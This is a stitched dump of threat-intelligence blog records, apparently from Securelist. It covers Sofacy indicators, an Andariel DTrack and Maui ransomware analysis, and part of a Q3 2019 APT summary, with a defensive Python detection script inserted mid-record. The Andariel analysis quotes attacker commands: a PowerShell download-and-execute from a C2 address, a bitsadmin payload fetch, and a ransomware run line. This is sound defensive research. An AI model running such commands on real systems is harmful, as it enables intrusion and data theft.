This certificate configuration is ignored by the malware.\n\n[](<https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/02/07163021/180220-sofacy-review-5.png>)\n\nIn addition to other ip data, this data point suggested that Qhoster at https://www.qhoster[.]com was a VPS hosting reseller of choice at the time. It should be noted that the reseller accepted Alfa Click, PayPal, Payza, Neteller, Skrill, WebMoney, Perfect Money, Bitcoin, Litecoin, SolidTrust Pay, CashU, Ukash, OKPAY, EgoPay, paysafecard, Alipay, MG, Western Union, SOFORT Banking, QIWI, Bank transfer for payment.\n\n## **Conclusion**\n\nSofacy, one of the most active APT we monitor, continues to spearphish their way into targets, reportedly widely phishes for credentials, and infrequently participates in server side activity (including host compromise with [BeEF deployment](<https://www.youtube.com/watch?v=yQ0zZ6Anb64&feature=youtu.be>), for example). KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia, and finally moving their focus further east into late 2017. Their operational security is good. Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH, Zebrocy, and SPLM, to name a few. Their evolving and modified SPLM/CHOPSTICK/XAgent code is a long-standing part of Sofacy activity, however much of it is changing. We'll cover more recent 2018 change in their targeting and the malware itself at [SAS 2018](<https://sas.kaspersky.com/>).\n\nWith a group like Sofacy, once their attention is detected on a network, it is important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two factor authentication for services like email and vpn access. 
In order to identify their presence, not only can you gain valuable insight into their targeting from intelligence reports and gain powerful means of detections with hunting tools like YARA, but out-of-band processing with a solution like KATA is important.\n\n## **Technical Appendix**\n\n### **Related md5**\n\n8f9f697aa6697acee70336f66f295837 \n1a4b9a6b321da199aa6d10180e889313 \n842454b48f5f800029946b1555fba7fc \nd4a5d44184333442f5015699c2b8af28 \n1421419d1be31f1f9ea60e8ed87277db \nb1d1a2c64474d2f6e7a5db71ccbafa31 \n953c7321c4959655fdd53302550ce02d \n57601d717fcf358220340675f8d63c8a \n02b79c468c38c4312429a499fa4f6c81 \n85cd38f9e2c9397a18013a8921841a04 \nf8e92d8b5488ea76c40601c8f1a08790 \n66b4fb539806ce27be184b6735584339 \ne8e1fcf757fe06be13bead43eaa1338c \n953c7321c4959655fdd53302550ce02d \naa2aac4606405d61c7e53140d35d7671 \n85cd38f9e2c9397a18013a8921841a04 \n57601d717fcf358220340675f8d63c8a \n16e1ca26bc66e30bfa52f8a08846613d \nf8e92d8b5488ea76c40601c8f1a08790 \nb137c809e3bf11f2f5d867a6f4215f95 \n237e6dcbc6af50ef5f5211818522c463 \n88009adca35560810ec220544e4fb6aa \n2163a33330ae5786d3e984db09b2d9d2 \n02b79c468c38c4312429a499fa4f6c81 \n842454b48f5f800029946b1555fba7fc \nd4a5d44184333442f5015699c2b8af28 \nb88633376fbb144971dcb503f72fd192 \n8f9f697aa6697acee70336f66f295837 \nb6f77273cbde76896a36e32b0c0540e1 \n1a4b9a6b321da199aa6d10180e889313 \n1421419d1be31f1f9ea60e8ed87277db \n1a4b9a6b321da199aa6d10180e889313 \n9b10685b774a783eabfecdb6119a8aa3 \naa34fb2e5849bff4144a1c98a8158970 \naced5525ba0d4f44ffd01c4db2730a34 \nb1d1a2c64474d2f6e7a5db71ccbafa31 \nb924ff83d9120d934bb49a7a2e3c4292 \ncdb58c2999eeda58a9d0c70f910d1195 \nd4a5d44184333442f5015699c2b8af28 \nd6f2bf2066e053e58fe8bcd39cb2e9ad \n34dc9a69f33ba93e631cd5048d9f2624 \n1c6f8eba504f2f429abf362626545c79 \n139c9ac0776804714ebe8b8d35a04641 \ne228cd74103dc069663bb87d4f22d7d5 \nbed5bc0a8aae2662ea5d2484f80c1760 \n8c3f5f1fff999bc783062dd50357be79 \n5882a8dd4446abd137c05d2451b85fea \n296c956fe429cedd1b64b78e66797122 
\n82f06d7157dd28a75f1fbb47728aea25 \n9a975e0ddd32c0deef1318c485358b20 \n529424eae07677834a770aaa431e6c54 \n4cafde8fa7d9e67194d4edd4f2adb92b \nf6b2ef4daf1b78802548d3e6d4de7ba7 \nede5d82bb6775a9b1659dccb699fadcb \n116d2fc1665ce7524826a624be0ded1c \n20ff290b8393f006eaf4358f09f13e99 \n4b02dfdfd44df3c88b0ca8c2327843a4 \nc789ec7537e300411d523aef74407a5e \n0b32e65caf653d77cab2a866ee2d9dbc \n27faa10d1bec1a25f66e88645c695016 \n647edddf61954822ddb7ab3341f9a6c5 \n2f04b8eb993ca4a3d98607824a10acfb \n9fe3a0fb3304d749aeed2c3e2e5787eb \n62deab0e5d61d6bf9e0ba83d9e1d7e2b \n86b607fe63c76b3d808f84969cb1a781 \nf62182cf0ab94b3c97b0261547dfc6cf \n504182aaa5575bb38bf584839beb6d51 \nd79a21970cad03e22440ea66bd85931f\n\n### **Related domains**\n\nnethostnet[.]com \nhostsvcnet[.]com \netcrem[.]net \nmovieultimate[.]com \nnewfilmts[.]com \nfastdataexchange[.]org \nliveweatherview[.]com \nanalyticsbar[.]org \nanalyticstest[.]net \nlifeofmentalservice[.]com \nmeteost[.]com \nrighttopregnantpower[.]com \nkiteim[.]org \nadobe-flash-updates[.]org \ngeneralsecurityscan[.]com \nglobalresearching[.]org \nlvueton[.]com \naudiwheel[.]com \nonline-reggi[.]com \nfsportal[.]net \nnetcorpscanprotect[.]com \nmvband[.]net \nmvtband[.]net \nviters[.]org \ntreepastwillingmoment[.]com \nsendmevideo[.]org \nsatellitedeluxpanorama[.]com \nppcodecs[.]com \nencoder-info[.]tk \nwmdmediacodecs[.]com \npostlkwarn[.]com \nshcserv[.]com \nversiontask[.]com \nwebcdelivery[.]com \nmiropc[.]org \nsecurityprotectingcorp[.]com \nuniquecorpind[.]com \nappexsrv[.]net \nadobeupgradeflash[.]com", "cvss3": {}, "published": "2018-02-20T14:00:06", "type": "securelist", "title": "A Slice of 2017 Sofacy Activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0262", "CVE-2017-0263"], "modified": "2018-02-20T14:00:06", "id": "SECURELIST:F845B38B54D0C8C027B3C2728E64B367", "href": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 
2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. 
Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using "-t" and "\\- x" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. 
In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. 
This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). 
Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as "Backdoor.Preft" malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as "aka Dtrack, Valefor". 
Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor's TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", 
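The DTrack reconnaissance commands listed above (cmd.exe /c running ipconfig, tasklist, netstat, netsh and ping with output redirected under a `temp` directory) are a useful hunting pattern on their own. The following detection logic is an added example, not code from the Securelist post or from Kaspersky: it parses constructed process-creation records, classifies each redirected cmd.exe recon step, and flags a host when several distinct steps are spawned by the same parent within a short window. The `ts|host|parent|cmdline` record format, the host names and the timestamps are assumptions made for the sample; the `mvhost.exe` parent reuses the DTrack file name the post reports, but the log lines themselves are constructed.

```python
"""Flag DTrack-style host reconnaissance chains in process-creation logs.

Added example (not from the Securelist post). SAMPLE_LOG is constructed to
resemble Windows process-creation telemetry; the record format
'ts|host|parent|cmdline' and every value in it are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon commands the post reports the in-memory payload running via cmd.exe /c.
RECON_PATTERNS = {
    "ipconfig": re.compile(r"\bipconfig\s+/all\b", re.I),
    "tasklist": re.compile(r"\btasklist\b", re.I),
    "netstat": re.compile(r"\bnetstat\s+-naop\s+tcp\b", re.I),
    "netsh": re.compile(r"\bnetsh\s+interface\s+show\s+interface\b", re.I),
    "ping": re.compile(r"\bping\s+-n\s+1\s+8\.8\.8\.8\b", re.I),
}
# Output redirected (>) into a file under a '\temp\' directory, as in
# "%Temp%\temp\res.ip" from the post. Matches any drive/user path prefix.
REDIRECT_RE = re.compile(r'>\s*"?[^"\s]*\\temp\\[^"\s]+"?', re.I)
# The command must be launched through cmd.exe /c, as the payload does.
CMD_RE = re.compile(r'cmd\.exe"?\s+/c\s', re.I)

# Constructed sample records (not real victim telemetry).
SAMPLE_LOG = [
    r'2021-04-15T01:02:03|WS01|mvhost.exe|"C:\Windows\system32\cmd.exe" /c ipconfig /all > "%Temp%\temp\res.ip"',
    r'2021-04-15T01:02:04|WS01|mvhost.exe|"C:\Windows\system32\cmd.exe" /c tasklist > "%Temp%\temp\task.list"',
    r'2021-04-15T01:02:05|WS01|mvhost.exe|"C:\Windows\system32\cmd.exe" /c netstat -naop tcp > "%Temp%\temp\netstat.res"',
    r'2021-04-15T01:02:06|WS01|mvhost.exe|"C:\Windows\system32\cmd.exe" /c netsh interface show interface > "%Temp%\temp\netsh.res"',
    r'2021-04-15T01:02:07|WS01|mvhost.exe|"C:\Windows\system32\cmd.exe" /c ping -n 1 8.8.8.8 > "%Temp%\temp\ping.res"',
    # Interactive ipconfig with no redirection into a temp directory: not a recon step.
    r'2021-04-15T01:10:00|WS02|explorer.exe|"C:\Windows\system32\cmd.exe" /c ipconfig /all',
    # ping launched directly rather than via cmd.exe /c with redirection: not a recon step.
    r'2021-04-15T01:11:00|WS03|svchost.exe|C:\Windows\system32\ping.exe -n 1 8.8.8.8',
    # One redirected tasklist on its own stays below the chain threshold.
    r'2021-04-15T01:12:00|WS04|cmd.exe|"C:\Windows\system32\cmd.exe" /c tasklist > "C:\Users\a\AppData\Local\Temp\temp\task.list"',
]


def parse_line(line):
    """Split one 'ts|host|parent|cmdline' record into a dict (cmdline may contain '|')."""
    ts, host, parent, cmdline = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "parent": parent, "cmdline": cmdline}


def classify(cmdline):
    """Return the recon command name for a redirected cmd.exe /c recon step, else None."""
    if not CMD_RE.search(cmdline) or not REDIRECT_RE.search(cmdline):
        return None
    for name, pattern in RECON_PATTERNS.items():
        if pattern.search(cmdline):
            return name
    return None


def detect(lines, min_distinct=3, window=timedelta(minutes=5)):
    """Return {host: sorted recon names} for every host where one parent process
    spawned at least `min_distinct` different recon steps inside `window`.

    Grouping by (host, parent) keeps an admin's one-off tasklist from merging
    with unrelated activity; the sliding window tolerates slow chains.
    """
    events = defaultdict(list)  # (host, parent) -> [(ts, recon name)]
    for line in lines:
        record = parse_line(line)
        name = classify(record["cmdline"])
        if name:
            events[(record["host"], record["parent"])].append((record["ts"], name))

    hits = {}
    for (host, _parent), evs in events.items():
        evs.sort()
        for i, (t0, _name) in enumerate(evs):
            names = {n for t, n in evs[i:] if t - t0 <= window}
            if len(names) >= min_distinct:
                hits[host] = sorted(names)
                break
    return hits


if __name__ == "__main__":
    for host, steps in detect(SAMPLE_LOG).items():
        print(f"{host}: DTrack-style recon chain {steps}")
```

Running the block on the constructed sample flags only WS01, whose `mvhost.exe` parent runs all five redirected recon commands within seconds; the interactive ipconfig, the bare ping.exe and the lone redirected tasklist stay below the threshold. In a real pipeline the same `classify`/`detect` pair would be fed from process-creation telemetry such as Sysmon event ID 1 or EDR process events, and the `\temp\` path component can be widened if an environment sees the artifacts written elsewhere.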
---

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.

## **The most remarkable findings**

On August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or whether they are still active, it claims that these websites receive "thousands of visitors per week". The first-stage WebKit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contain many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and to keep the exploitation chains up to date for more than two years, show a high level of resources and dedication. Upon infection, the malware itself is invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to access all kinds of files on the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal sign-in cookies from a victim's accounts can keep providing the attackers with access to this data.

Shortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a "strategic web compromise targeting Uyghurs". Citizen Lab published the Android counterpart to this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.

At the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v4l2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.

## **Russian-speaking activity**

Turla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a .NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.

Turla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.

In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.

## **Chinese-speaking activity**

HoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts, .NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over HTTP for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While a military organization was targeted in Bangladesh, it's possible that the individual targets were related to geopolitical activity in the region.

Since the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to rely solely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.

Our January 2018 private report 'ShaggyPanther – Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.

## **Middle East**

On August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, "HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic, unsophisticated droppers distributed through spear phishing, and DNS-based C2 exfiltration.

TortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war 